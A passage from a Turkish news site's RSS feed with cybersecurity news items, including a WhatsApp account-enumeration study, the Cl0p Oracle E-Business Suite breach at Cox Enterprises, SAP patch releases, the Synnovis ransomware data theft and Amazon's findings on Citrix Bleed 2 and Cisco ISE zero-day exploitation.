<guid>https://www.ajansexpres.com.tr/whatsappta-hiz-siniri-olmayan-api-acigi-arastirmacilarin-35-milyar-hesabi-dogrulamasina-imkan-tanidi</guid>
<description><![CDATA[ Viyana Üniversitesi ve SBA Research araştırmacıları, WhatsApp’ın kişi keşfi için kullandığı API uç noktasında hız sınırı uygulanmamasını kötüye kullanarak 3,5 milyar aktif hesabı tespit ettiklerini açıkladı. Araştırmacılar, sadece beş oturumla tek bir sunucu üzerinden dünya genelinde 63 milyar mobil numarayı sorguladıklarını, WhatsApp’ın ise bu yoğun trafiği hiçbir aşamada engellemediğini bildirdi. Şirket açığın bildirilmesinin ardından hız sınırlaması eklerken, çalışma büyük ölçekli veri kazımaya karşı API güvenliğinin önemini yeniden gündeme taşıdı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c04e2064.webp" length="133394" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:18:55 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>whatsapp api açığı, whatsapp 35 milyar hesap doğrulama, getdevicelist hız sınırı sorunu, whatsapp veri kazıma araştırması</media:keywords>
<content:encoded><![CDATA[<p><br>WhatsApp’ın kişi keşfi için kullanılan <strong data-start="748" data-end="765">GetDeviceList</strong> API uç noktasında hız sınırı bulunmadığını tespit eden araştırmacılar, bu sayede mobil numaraların platformda kayıtlı olup olmadığını büyük ölçekli biçimde sorgulayabildiklerini açıkladı. Araştırma kapsamında 3,5 milyar aktif hesabın doğrulandığı bildirildi.</p>
<p></p>
<p data-start="1026" data-end="1396"><strong data-start="1026" data-end="1085">“Tek Bir Sunucudan Saatte 100 Milyon Numara Sorguladık”</strong><br>Viyana Üniversitesi ve SBA Research ekibi, çalışmayı tek bir üniversite sunucusundan yürüttü. Araştırmacılar, “Sadece beş oturumla saat başına 100 milyondan fazla numarayı kontrol edebildik. WhatsApp hiçbir aşamada hesapları engellemedi, trafiği kısıtlamadı, IP adresimizi bloke etmedi.” açıklamasında bulundu.</p>
<p data-start="1398" data-end="1574">Araştırmacılar, toplamda 63 milyar potansiyel mobil numara üreterek bunların tamamını API üzerinden test etti ve yanıt olarak 3,5 milyar aktif hesabın kayda geçtiğini belirtti.</p>
<p data-start="1576" data-end="1900"><strong data-start="1576" data-end="1618">Küresel Kullanım Haritası Ortaya Çıktı</strong><br>Elde edilen sonuçlar, WhatsApp’ın dünya genelindeki kullanım yoğunluğunu da gösterdi. Verilere göre <strong data-start="1719" data-end="1743">Hindistan 749 milyon</strong>, <strong data-start="1745" data-end="1769">Endonezya 235 milyon</strong>, <strong data-start="1771" data-end="1794">Brezilya 206 milyon</strong>, <strong data-start="1796" data-end="1814">ABD 138 milyon</strong>, <strong data-start="1816" data-end="1836">Rusya 133 milyon</strong> ve <strong data-start="1840" data-end="1862">Meksika 128 milyon</strong> aktif hesapla ilk sıralarda yer aldı.</p>
<p data-start="1902" data-end="2111">Araştırma, Çin, İran, Kuzey Kore ve Myanmar gibi yasaklı ülkelerde de milyonlarca aktif hesabın bulunduğunu ortaya koydu. İran’da kullanımın 2024 sonunda yasağın kaldırılmasının ardından arttığı tespit edildi.</p>
<p data-start="2113" data-end="2489"><strong data-start="2113" data-end="2172">Profil Fotoğrafları ve “Hakkında” Bilgileri de Toplandı</strong><br>Araştırmacılar, GetUserInfo, GetPrekeys ve FetchPicture gibi diğer API uç noktalarını kullanarak kullanıcıların profil fotoğrafları, “hakkında” yazıları ve cihaz bilgilerine erişilebildiğini belirtti. ABD numaralarına yönelik bir testte <strong data-start="2410" data-end="2443">77 milyon profil fotoğrafının</strong> hız limiti olmadan indirilebildiği aktarıldı.</p>
<p data-start="2491" data-end="2673">Paylaşılan örneklerde, profil fotoğraflarının tanınabilir yüzler içerdiği, “hakkında” metinlerinin ise kişisel bilgiler ve diğer sosyal medya bağlantılarına işaret ettiği belirtildi.</p>
<p data-start="2675" data-end="3094"><strong data-start="2675" data-end="2730">“Tarihin En Büyük Veri Setlerinden Biri Olabilirdi”</strong><br>Araştırma ekibi, yayımladıkları makalede, “3,5 milyarlık kayıt, eğer sorumlu bir şekilde toplanmamış olsaydı tarihteki en büyük veri sızıntılarından biri olurdu.” ifadelerini kullandı. Veri setinin telefon numaraları, zaman damgaları, fotoğraflar ve uçtan uca şifreleme anahtarlarını içerdiği, kötü niyetli bir yayınlanmanın ağır sonuçlara yol açacağı vurgulandı.</p>
<p data-start="3096" data-end="3524"><strong data-start="3096" data-end="3130">API Güvenliğinde Yapısal Sorun</strong><br>WhatsApp’ın hız sınırı eksikliğinin, büyük platformlarda sıkça karşılaşılan bir güvenlik zafiyetini yansıttığı ifade edildi. Facebook’un 2021’de 533 milyon kullanıcının bilgilerinin kazınmasına yol açan API açığı, Twitter’ın 54 milyon hesabın telefon ve e-posta eşleşmesinin yapılmasına neden olan sorun ve Dell’in 49 milyon müşteri kaydının çekildiği olay benzer örnekler arasında gösterildi.</p>
<p data-start="3526" data-end="3729">Araştırmacılar, WhatsApp’ın bildirim sonrası hız sınırı eklediğini, ancak büyük ölçekli doğrulamanın platformların veri koruma mimarisini yeniden gözden geçirmesi gerektiğini ortaya koyduğunu ifade etti.</p>
<p data-start="3731" data-end="3867"><strong data-start="3731" data-end="3743"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Oracle E&#45;Business Suite sıfır gün açığıyla sızılan Cox Enterprises veri ihlali milyonlarca dolarlık dev şirketi etkiledi</title>
<link>https://www.ajansexpres.com.tr/oracle-e-business-suite-sifir-gun-acigiyla-sizilan-cox-enterprises-veri-ihlali-milyonlarca-dolarlik-dev-sirketi-etkiledi</link>
<guid>https://www.ajansexpres.com.tr/oracle-e-business-suite-sifir-gun-acigiyla-sizilan-cox-enterprises-veri-ihlali-milyonlarca-dolarlik-dev-sirketi-etkiledi</guid>
<description><![CDATA[ ABD merkezli Cox Enterprises, Oracle E-Business Suite platformundaki sıfır gün güvenlik açığının siber korsanlar tarafından kötüye kullanılması sonucunda yaşanan veri ihlalini doğruladı. Şirket, Ağustos 2025’te gerçekleşen sızmanın ancak Eylül sonunda tespit edildiğini bildirerek 9.479 kişiye bildirim gönderdi. Cl0p adlı fidye yazılımı grubu saldırının sorumluluğunu üstlenirken, çok sayıda uluslararası şirketin de benzer şekilde etkilendiği açıklandı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270ad7e6eea.webp" length="55436" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:13:05 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>cox enterprises oracle veri ihlali, cl0p oracle e business suite açığı, cve 2025 61882 nedir, oracle e business suite siber saldırı</media:keywords>
<content:encoded><![CDATA[<p><br>Cox Enterprises, Oracle E-Business Suite yazılımında bulunan ve o dönemde bilinmeyen bir güvenlik açığının kullanılmasıyla şirket ağına sızıldığını açıkladı. Şirket, ihlalin 9–14 Ağustos 2025 tarihleri arasında gerçekleştiğini, ancak sistemlerdeki olağan dışı hareketliliğin 29 Eylül’de fark edildiğini bildirdi.</p>
<p></p>
<p data-start="939" data-end="1284"><strong data-start="939" data-end="977">“Sıfır Gün Açığından Yararlanıldı”</strong><br>Cox Enterprises tarafından yapılan açıklamada, “E-Business Suite üzerinde tespit edilen şüpheli etkinliğin, daha önce bilinmeyen bir güvenlik açığının siber suçlular tarafından kötüye kullanılmasından kaynaklandığını öğrendik.” ifadeleri yer aldı. Açığın Oracle tarafından 5 Ekim’de yamalandığı belirtildi.</p>
<p data-start="1286" data-end="1631"><strong data-start="1286" data-end="1321">Cl0p Grubu Sorumluluğu Üstlendi</strong><br>Saldırının arkasındaki grubun resmi olarak açıklanmamasına rağmen, fidye yazılımı operasyonu yürüten <strong data-start="1423" data-end="1431">Cl0p</strong> ekibi, CVE-2025-61882 kodlu açığı sıfır gün olarak kullandığını iddia etti. Grup, Cox Enterprises’ı 27 Ekim’de karanlık ağdaki sızıntı sitesine ekleyerek çalındığını ileri sürdüğü verileri yayımladı.</p>
<p data-start="1633" data-end="1852">Cl0p’ın daha önce Cleo dosya aktarım platformu (2024), MOVEit Transfer ve GoAnywhere MFT (2023), SolarWinds Serv-U FTP (2021) ve Accellion FTA (2020) gibi popüler yazılımlarda bilinmeyen açıkları hedef aldığı biliniyor.</p>
<p data-start="1854" data-end="2150"><strong data-start="1854" data-end="1905">Diğer Şirketlerde de Benzer İhlaller Doğrulandı</strong><br>Oracle E-Business Suite’e yönelik aynı açığın kullanıldığı veri ihlalleri Logitech, Washington Post, GlobalLogic, Envoy Air ve Harvard University tarafından da doğrulandı. Siber güvenlik kaynakları, listenin genişlemeye devam ettiğini bildirdi.</p>
<p data-start="2152" data-end="2574"><strong data-start="2152" data-end="2194">Etkilenen Kişilere Bildirim Gönderildi</strong><br>Cox Enterprises, 55.000 çalışanı ve 23 milyar dolarlık yıllık geliriyle ABD’nin önde gelen şirketleri arasında yer alıyor. Şirket, 9.479 kişinin etkilendiğini belirterek kimlik hırsızlığı koruma ve kredi izleme hizmetlerini IDX üzerinden 12 ay boyunca ücretsiz sunduğunu açıkladı. Paylaşılan resmi bildirim örneğinde hangi veri türlerinin sızdığına ilişkin ayrıntılar yer almadı.</p>
<p data-start="2576" data-end="2770"><strong data-start="2576" data-end="2597">Kapsam Genişliyor</strong><br>Siber korsan grubunun aynı gün 29 yeni şirketi daha hedef listesine eklemesi, özellikle otomotiv, yazılım ve teknoloji sektörlerinde risk seviyesinin arttığına işaret etti.</p>
<p data-start="2772" data-end="2918"><strong data-start="2772" data-end="2784"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Uzmanlarının iPhone İncelemesinde WhatsApp Mesajlarından Gönderici Konumu Dahil Geniş Ölçekte Gizli Veriler Ortaya Çıktı</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmanlarinin-iphone-incelemesinde-whatsapp-mesajlarindan-goenderici-konumu-dahil-genis-olcekte-gizli-veriler-ortaya-cikti</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmanlarinin-iphone-incelemesinde-whatsapp-mesajlarindan-goenderici-konumu-dahil-genis-olcekte-gizli-veriler-ortaya-cikti</guid>
<description><![CDATA[ Bir siber güvenlik uzmanının iPhone 12 Pro Max üzerinde gerçekleştirdiği adli veri incelemesinde, WhatsApp mesajları, medya dosyaları ve uygulama kayıtlarında kullanıcıların farkında olmadan bıraktığı kapsamlı konum ve hesap verilerinin kurtarılabildiği tespit edildi. İnceleme, mesaj göndericilerinin konumlarının alıcı cihaz üzerinden çıkarılabildiğini ve senkronize hesap bilgilerinin jailbreak olmadan erişilebilir olduğunu ortaya koyarak mobil güvenlik risklerine dikkat çekti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6926b17b707ea.webp" length="16452" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 10:51:38 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>iphone adli inceleme konum verisi, whatsapp mesaj konumu çıkarılabilir mi, ios senkronize parola güvenliği, mobil cihazlarda metadata analizi</media:keywords>
<content:encoded><![CDATA[<p><br>Siber güvenlik araştırmacısı <strong data-start="696" data-end="712">Elorm Daniel</strong>, iPhone 12 Pro Max cihazı üzerinde yaptığı adli veri incelemesinde WhatsApp mesajlarının ve diğer uygulamaların beklenenden çok daha fazla kullanıcı verisi kaydettiğini açıkladı. Daniel, paylaştığı inceleme sonuçlarında sıradan bir WhatsApp mesajının bile göndericinin tam konum bilgisini içerebildiğini belirtti.</p>
<p></p>
<p data-start="1028" data-end="1382">Daniel, 3 Eylül 2025 tarihinde <strong data-start="1059" data-end="1078">RedHatPentester</strong> tarafından gönderilen bir WhatsApp mesajını örnek olarak seçtiğini ve mesajın normal görünmesine rağmen cihazın mesajın gönderildiği ana ait hassas konum verisini kaydettiğini ifade etti. Araştırmacı, “Gönderen konumunu paylaşmadı, ben talep etmedim, ancak telefon bunu otomatik olarak kaydetmiş.” dedi.</p>
<p data-start="1384" data-end="1711"><strong data-start="1384" data-end="1426">Medya Dosyalarının Tümünde Konum Kaydı</strong><br>İncelemede, cihazda oluşturulan her fotoğraf, video, ekran görüntüsü ve ses kaydının çekildiği veya oluşturulduğu ana ait GPS koordinatlarını içerdiği ortaya çıktı. Daniel, bu verilerin hareket analizlerinde zaman çizelgesinin ayrıntılı biçimde çıkarılmasına imkân verdiğini kaydetti.</p>
<p data-start="1713" data-end="2093"><strong data-start="1713" data-end="1757">Senkronize Hesaplar ve Parolalara Erişim</strong><br>Adli incelemede en dikkat çeken bulgulardan biri, cihaz üzerinde senkronize tüm kullanıcı hesaplarına ait URL, kullanıcı adı ve parola bilgilerinin kurtarılabilmesi oldu. Daniel, bu bilgilerin jailbreak yapılmamış bir cihazdan elde edildiğini vurgulayarak, “Bütün senkronize parolalar eksiksiz şekilde çıkarıldı.” ifadelerini kullandı.</p>
<p data-start="2095" data-end="2420"><strong data-start="2095" data-end="2145">Uygulama Kayıtları ve WhatsApp Grup Geçmişleri</strong><br>Araştırmada cihazda bulunan tüm uygulamalara ait kullanım geçmişleri, dahili kayıtlar ve metadata bilgileri de elde edildi. WhatsApp özelinde ise kullanıcının katıldığı tüm grupların geçmişi, grupların oluşturulma tarihleri, kurucu bilgileri ve katılım zamanları kurtarıldı.</p>
<p data-start="2422" data-end="2546">Daniel, “Cihaz, bir gruptan yıllar önce çıkılmış olsa bile oluşturulma tarihi ve katılım bilgilerini kayıtlı tutuyor.” dedi.</p>
<p data-start="2548" data-end="2874"><strong data-start="2548" data-end="2575">Mesaj Bazlı Konum Kaydı</strong><br>İncelemede, WhatsApp mesajlarının gönderildiği anda cihaz tarafından kaydedilen konum bilgilerinin mesaj bazında dahi erişilebilir olması, uzmanlara göre adli incelemelerde kritik bir veri kaynağı niteliği taşıyor. Daniel, birçok kullanıcının bu kayıtların tutulduğundan habersiz olduğunu belirtti.</p>
<p data-start="2876" data-end="3113">Daniel, yaptığı değerlendirmede “Her cihaz bir hikâye anlatıyor; mesajlar sadece yazıdan ibaret değil.” ifadelerini kullanarak dijital aygıtların gizli veri saklama kapasitesinin çoğu kullanıcı tarafından fark edilmediğinin altını çizdi.</p>
<p data-start="3115" data-end="3271"><strong data-start="3115" data-end="3127"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>SAP Kasım Güncellemeleri SQL Anywhere Monitor’daki Hardcoded Kimlik Bilgisi Açığını ve Solution Manager’daki Kritik Kod Enjeksiyonunu Giderdi</title>
<link>https://www.ajansexpres.com.tr/sap-kasim-guncellemeleri-sql-anywhere-monitordaki-hardcoded-kimlik-bilgisi-acigini-ve-solution-managerdaki-kritik-kod-enjeksiyonunu-giderdi</link>
<guid>https://www.ajansexpres.com.tr/sap-kasim-guncellemeleri-sql-anywhere-monitordaki-hardcoded-kimlik-bilgisi-acigini-ve-solution-managerdaki-kritik-kod-enjeksiyonunu-giderdi</guid>
<description><![CDATA[ SAP, Kasım 2025 güvenlik güncellemeleri kapsamında SQL Anywhere Monitor’ün GUI olmayan sürümünde yer alan ve 10.0 maksimum önem derecesi verilen hardcoded kimlik bilgisi açığını (CVE-2025-42890) düzeltti. Şirket ayrıca SAP Solution Manager platformunda kimlik doğrulamalı saldırganların uzaktan kötü amaçlı kod enjekte etmesine yol açabilen CVE-2025-42887 kodlu 9.9 önem dereceli zafiyeti kapattı. Kurumsal ortamlarda geniş çapta kullanılan SAP ürünleri için yayımlanan paket, yüksek önem dereceli bir hata ve 14 orta seviye güvenlik açığını da içeriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_691531a053e0b.webp" length="50214" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:18:52 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>sap sql anywhere monitor açığı, solution manager cve 2025 42887, sap kasım 2025 güvenlik güncellemesi, hardcoded credentials riski</media:keywords>
<content:encoded><![CDATA[<p>SAP, Kasım 2025 güvenlik bülteniyle kritik etkiler doğurabilecek iki zafiyet için düzeltme yayımladı. En yüksek önem dereceli açık <strong data-start="876" data-end="894">CVE-2025-42890</strong>, SQL Anywhere Monitor’ün <strong data-start="920" data-end="931">non-GUI</strong> bileşeninde gömülü kullanıcı bilgileri bulunmasından kaynaklanıyor.</p>
<p></p>
<p data-start="1001" data-end="1430"><strong data-start="1001" data-end="1064">Hardcoded Kimlik Bilgileri Sistem Kontrolünü Riske Atıyordu</strong><br data-start="1064" data-end="1067">SAP, hatanın bileşen içine sabitlenmiş kimlik bilgileri nedeniyle yetkisiz kullanıcıların ilgili işlevlere erişerek kötü amaçlı kod çalıştırabileceğini belirtti. SQL Anywhere Monitor, dağıtık veritabanlarını yöneten şirketlerde sıkça kullanılan bir izleme ve uyarı aracı olup, non-GUI sürüm genellikle insan müdahalesinin sınırlı olduğu cihazlarda çalıştırılıyor.</p>
<p data-start="1432" data-end="1858"><strong data-start="1432" data-end="1478">Solution Manager’da Kritik Kod Enjeksiyonu</strong><br data-start="1478" data-end="1481">İkinci kritik açık olan <strong data-start="1505" data-end="1523">CVE-2025-42887</strong>, SAP Solution Manager üzerinde eksik giriş doğrulamasından kaynaklanıyor. Ulusal Zafiyet Veritabanı açıklamasına göre kimlik doğrulaması olan bir saldırgan, uzaktan erişilebilir fonksiyon modüllerine kod enjekte ederek sistemi tamamen ele geçirebiliyor. Bu durum gizlilik, bütünlük ve erişilebilirlik üzerinde ciddi etkiler yaratıyor.</p>
<p data-start="1860" data-end="2258"><strong data-start="1860" data-end="1912">Geniş SAP Ekosistemine Yönelik Diğer Düzeltmeler</strong><br data-start="1912" data-end="1915">Güncelleme paketi ayrıca bir <strong data-start="1944" data-end="1983">yüksek önem dereceli CVE-2025-42940</strong> hatası ile <strong data-start="1995" data-end="2022">14 orta seviye zafiyete</strong> yönelik yamalar içeriyor. SAP ayrıca geçen ay ilk düzeltmesi yayımlanan <strong data-start="2095" data-end="2123">NetWeaver CVE-2025-42944</strong> için ek güncellemeler sağladı. SAP altyapılarının kritik veri işlemeleri nedeniyle tehdit aktörlerinin sık hedefi olduğu belirtiliyor.</p>
<p data-start="2260" data-end="2695"><strong data-start="2260" data-end="2316">Önceki Saldırılar Güvenlik Risklerini Öne Çıkarmıştı</strong><br data-start="2316" data-end="2319">Bu yıl SecurityBridge araştırmacıları, SAP S/4HANA, Business One ve NetWeaver sistemlerini etkileyen <strong data-start="2420" data-end="2438">CVE-2025-42957</strong> kodlu kritik kod enjeksiyonu zafiyetinin aktif olarak istismar edildiğini raporlamıştı. SAP, Kasım’da yamaladığı iki kritik açık için ise henüz aktif istismar tespit edilmediğini, ancak yöneticilerin düzeltmeleri ivedilikle uygulaması gerektiğini bildirdi.</p>
<p data-start="2697" data-end="2817">SAP, CVE-2025-42890 ve CVE-2025-42887 için önerilen azaltma adımlarının yalnızca hesap sahiplerine sunulduğunu açıkladı.</p>
<p data-start="2819" data-end="2964"><strong data-start="2819" data-end="2831"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Synnovis 2024 Londra Ransomware Saldırısının Ardından Hastalara Ait Verilerin Çalındığını Doğruladı: NHS Kurumlarına Bildirim Süreci Başladı</title>
<link>https://www.ajansexpres.com.tr/synnovis-2024-londra-ransomware-saldirisinin-ardindan-hastalara-ait-verilerin-calindigini-dogruladi-nhs-kurumlarina-bildirim-sureci-basladi</link>
<guid>https://www.ajansexpres.com.tr/synnovis-2024-londra-ransomware-saldirisinin-ardindan-hastalara-ait-verilerin-calindigini-dogruladi-nhs-kurumlarina-bildirim-sureci-basladi</guid>
<description><![CDATA[ Birleşik Krallık’ın önde gelen patoloji hizmet sağlayıcılarından Synnovis, Haziran 2024’te Londra’daki büyük NHS hastanelerini etkileyen ransomware saldırısı sonrası bazı hasta bilgilerinin sızdırıldığını doğrulayarak ilgili sağlık kuruluşlarını bilgilendirmeye başladı. Şirket, çalınan verilerin parçalı ve yorumlanması güç yapıda olduğunu, incelemenin bir yılı aşkın süre boyunca adli bilişim ve veri uzmanları tarafından yürütüldüğünü bildirdi. NHS sayıları, doğum tarihleri ve bazı test sonuçlarını içeren verilerin Qilin RaaS operasyonuyla bağlantılı saldırganlarca ele geçirildiği değerlendiriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915318d0f32d.webp" length="27648" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:18:37 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>synnovis veri ihlali 2024, qilin ransomware bağlantısı, nhs hasta verisi sızıntısı, synnovis bildirim süreci</media:keywords>
<content:encoded><![CDATA[<p>Synnovis, Haziran 2024’teki siber saldırının ardından yapılan incelemelerde bazı hasta bilgilerinin yetkisiz kişilerce kopyalandığını tespit ettiğini açıkladı. Şirket, 21 Kasım 2025’e kadar NHS hastaneleri ve kliniklerini kapsayan bildirim sürecinin tamamlanacağını belirtti.</p>
<p></p>
<p data-start="1072" data-end="1510"><strong data-start="1072" data-end="1113">Parçalı ve Zor Yorumlanan Veri Yapısı</strong><br data-start="1113" data-end="1116">Synnovis, çalınan verilerin büyük bölümünün <strong data-start="1160" data-end="1190">yapılandırılmamış ve eksik</strong> olduğunu, bu nedenle inceleme sürecinin özel platformlar ve geliştirilmiş analiz yöntemleri gerektirdiğini kaydetti. Veriler arasında NHS numaraları, isimler, doğum tarihleri ve bireylerle eşleştirilebilen bazı test sonuçları bulunuyor. Şirket, çoğu bilginin klinik uzmanlık olmadan anlamlandırılamayacağını ifade etti.</p>
<p data-start="1512" data-end="1975"><strong data-start="1512" data-end="1557">2024 Saldırısının NHS Üzerindeki Etkileri</strong><br data-start="1557" data-end="1560">3 Haziran 2024’te gerçekleşen saldırı, Londra’daki <strong data-start="1611" data-end="1738">King’s College Hospital, Guy’s Hospital, St Thomas’ Hospital, Royal Brompton Hospital ve Evelina London Children’s Hospital</strong> gibi büyük merkezlerde ciddi operasyonel aksamalara yol açmıştı. Patoloji randevuları ve kan nakli hizmetleri iptal edilmiş, oluşan tedarik sıkıntısı nedeniyle <strong data-start="1899" data-end="1961">800’den fazla planlı operasyon ve 700 poliklinik randevusu</strong> ertelenmişti.</p>
<p data-start="1977" data-end="2381"><strong data-start="1977" data-end="2021">Qilin Ransomware Operasyonu ile Bağlantı</strong><br data-start="2021" data-end="2024">Synnovis saldırgan isimleri açıklamasa da, dönemin NCSC kurucu CEO’su Ciaran Martin saldırıyı <strong data-start="2118" data-end="2127">Qilin</strong> ransomware grubu ile ilişkilendirmişti. Qilin, Haziran 2024’te Synnovis’e ait olduğunu iddia ettiği verileri dark web sızıntı sitesinde yayımlamıştı. Şirket, NHS Trust ortaklarıyla yaptığı değerlendirme sonrası fidye ödememeyi kararlaştırdığını duyurdu.</p>
<p data-start="2383" data-end="2730"><strong data-start="2383" data-end="2421">NHS Kurumlarına Bildirim ve Destek</strong><br data-start="2421" data-end="2424">Synnovis, hasta bilgilendirmesinin GDPR gereği ilgili NHS kurumları tarafından yapılacağını, kendilerinin bu kuruluşlara rehberlik sağladığını açıkladı. Şirket, çalınan verilerin hasta etkisini değerlendirmenin kuruluş bazında farklılık gösterebileceğini ve bu konuda varsayımda bulunmayacağını ifade etti.</p>
<p data-start="2732" data-end="2845">Qilin’in 2022’den bu yana <strong data-start="2758" data-end="2773">RaaS modeli</strong> ile faaliyet gösterdiği ve 300’den fazla kurumu hedef aldığı biliniyor.</p>
<p data-start="2847" data-end="2970"><strong data-start="2847" data-end="2859"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Gelişmiş Tehdit Aktörü Citrix Bleed 2 ve Cisco ISE Açıklarını Sıfır Gün Saldırılarında Kullandı: Amazon MadPot Analizi Özel Kötü Amaçlı Yazılımı Ortaya Çıkardı</title>
<link>https://www.ajansexpres.com.tr/gelismis-tehdit-aktoeru-citrix-bleed-2-ve-cisco-ise-aciklarini-sifir-gun-saldirilarinda-kullandi-amazon-madpot-analizi-ozel-koetu-amacli-yazilimi-ortaya-cikardi</link>
<guid>https://www.ajansexpres.com.tr/gelismis-tehdit-aktoeru-citrix-bleed-2-ve-cisco-ise-aciklarini-sifir-gun-saldirilarinda-kullandi-amazon-madpot-analizi-ozel-koetu-amacli-yazilimi-ortaya-cikardi</guid>
<description><![CDATA[ Amazon Threat Intelligence ekibi, MadPot honeypot verileri üzerinden Citrix’in NetScaler ADC ve Gateway ürünlerindeki “Citrix Bleed 2” (CVE-2025-5777) açığının ve Cisco Identity Service Engine’deki (CVE-2025-20337) kritik güvenlik zafiyetinin kamuya açıklanmadan önce gelişmiş bir tehdit aktörü tarafından sıfır gün olarak kullanıldığını tespit etti. Araştırmada, saldırganların Cisco ISE üzerinde “IdentityAuditAction” adıyla gizlenen özel bir web shell konuşlandırdığı, Java/Tomcat iç yapıları ve yetkisiz yönetici erişim zincirinden yararlandığı belirlendi. Her iki güvenlik açığının haziran ve temmuz aylarında yayımlanan yamalardan önce istismar edildiği doğrulanırken, uzmanlar organizasyonları acil güncelleme ve erişim kısıtlamaları uygulamaya çağırıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915317a22101.webp" length="49392" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:18:22 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>citrix bleed 2 nedir, cisco ise cve 2025 20337 istismarı, amazon madpot analizi, identityauditaction web shell özellikleri</media:keywords>
<content:encoded><![CDATA[<p>Amazon Threat Intelligence, <strong data-start="999" data-end="1031">MadPot honeypot platformunda</strong> topladığı veriler üzerinden <strong data-start="1060" data-end="1094">Citrix Bleed 2 (CVE-2025-5777)</strong> ve <strong data-start="1098" data-end="1126">Cisco ISE CVE-2025-20337</strong> açıklarının kamuya açıklanmadan önce saldırganlar tarafından kullanıldığını tespit etti. Ekip, istismar girişimlerinin yama yayımlanmadan önce görülmesinin gelişmiş ve iyi kaynaklı bir aktöre işaret ettiğini bildirdi.</p>
<p></p>
<p data-start="1346" data-end="1835"><strong data-start="1346" data-end="1398">Citrix Açığı Kamuya Açıklanmadan İstismar Edildi</strong><br data-start="1398" data-end="1401">Citrix Bleed 2, NetScaler ADC ve Gateway’de <strong data-start="1445" data-end="1474">out-of-bounds memory read</strong> sorununa dayanıyor ve üretici haziran sonunda düzeltme yayımlamıştı. Üçüncü taraf raporlara rağmen Citrix’in istismarı doğrulaması zaman almış, temmuz ayında exploit kodu yayılmış ve CISA açığı “aktif istismar edilenler” listesine eklemişti. Amazon’un bulguları, saldırganların zafiyeti sürdürülen araştırmalardan önce sıfır gün olarak kullandığını gösteriyor.</p>
<p data-start="1837" data-end="2436"><strong data-start="1837" data-end="1898">Cisco ISE Açığı Gizli Bir Uç Nokta Üzerinden Hedef Alındı</strong><br data-start="1898" data-end="1901">Amazon, Citrix istismarı sırasında saldırganın Cisco ISE üzerinde daha önce belgelenmemiş bir uç noktayı hedefleyen <strong data-start="2017" data-end="2035">anomal bir yük</strong> kullandığını belirledi ve verileri Cisco ile paylaştı. Temmuz ayında en yüksek önem derecesiyle yayımlanan CVE-2025-20337, kimlik doğrulaması olmayan bir saldırganın kötü amaçlı dosyalar yazmasına, kod yürütmesine ve root ayrıcalıkları elde etmesine olanak tanıyor. Yayından sonraki beş gün içinde aktif istismar teyit edilmiş ve araştırmacılar istismar zincirine dair teknik ayrıntıları paylaşmıştı.</p>
<p data-start="2438" data-end="3021"><strong data-start="2438" data-end="2494">Özel Web Shell ile Gizli Kalma Teknikleri Kullanıldı</strong><br data-start="2494" data-end="2497">Saldırganlar Cisco ISE üzerinde <strong data-start="2529" data-end="2554">‘IdentityAuditAction’</strong> adını taşıyan ve meşru bir bileşen gibi davranan özel bir web shell yerleştirdi. Bu bileşen, bir <strong data-start="2652" data-end="2670">HTTP dinleyici</strong> olarak çalışarak tüm istekleri yakaladı, <strong data-start="2712" data-end="2731">Java reflection</strong> kullanarak <strong data-start="2743" data-end="2753">Tomcat</strong> iş parçacıklarına enjekte oldu ve standart dışı base64 ile birlikte <strong data-start="2822" data-end="2839">DES şifreleme</strong> kullanarak trafiğini gizledi. Web shell, yalnızca belirli HTTP üstbilgilerini bilen kişiler tarafından erişilebilir durumdaydı ve adli izleri en aza indirecek şekilde tasarlanmıştı.</p>
<p data-start="3023" data-end="3511"><strong data-start="3023" data-end="3085">Gelişmiş Teknikler Geniş Kaynaklı Bir Aktöre İşaret Ediyor</strong><br data-start="3085" data-end="3088">Hem sıfır gün açıkların kullanılması hem de Cisco ISE’nin iç mimarisi hakkında derin teknik bilgi gerektiren yöntemler, operasyonun yüksek kabiliyetli bir tehdit aktörü tarafından yürütüldüğünü düşündürüyor. Ancak Amazon, faaliyeti bilinen bir grubun taktikleriyle ilişkilendiremedi. Buna karşın saldırıların <strong data-start="3397" data-end="3427">seçici olmayan hedeflemeye</strong> sahip olması, tipik APT operasyonlarından ayrışan bir unsur olarak değerlendirildi.</p>
<p data-start="3513" data-end="3724">Uzmanlar, kurumların <strong data-start="3534" data-end="3551">CVE-2025-5777</strong> ve <strong data-start="3555" data-end="3573">CVE-2025-20337</strong> için yayımlanan düzeltmeleri derhal uygulamasını ve kenar ağ cihazlarına erişimi güvenlik duvarı ve katmanlama ilkeleriyle sınırlandırmasını öneriyor.</p>
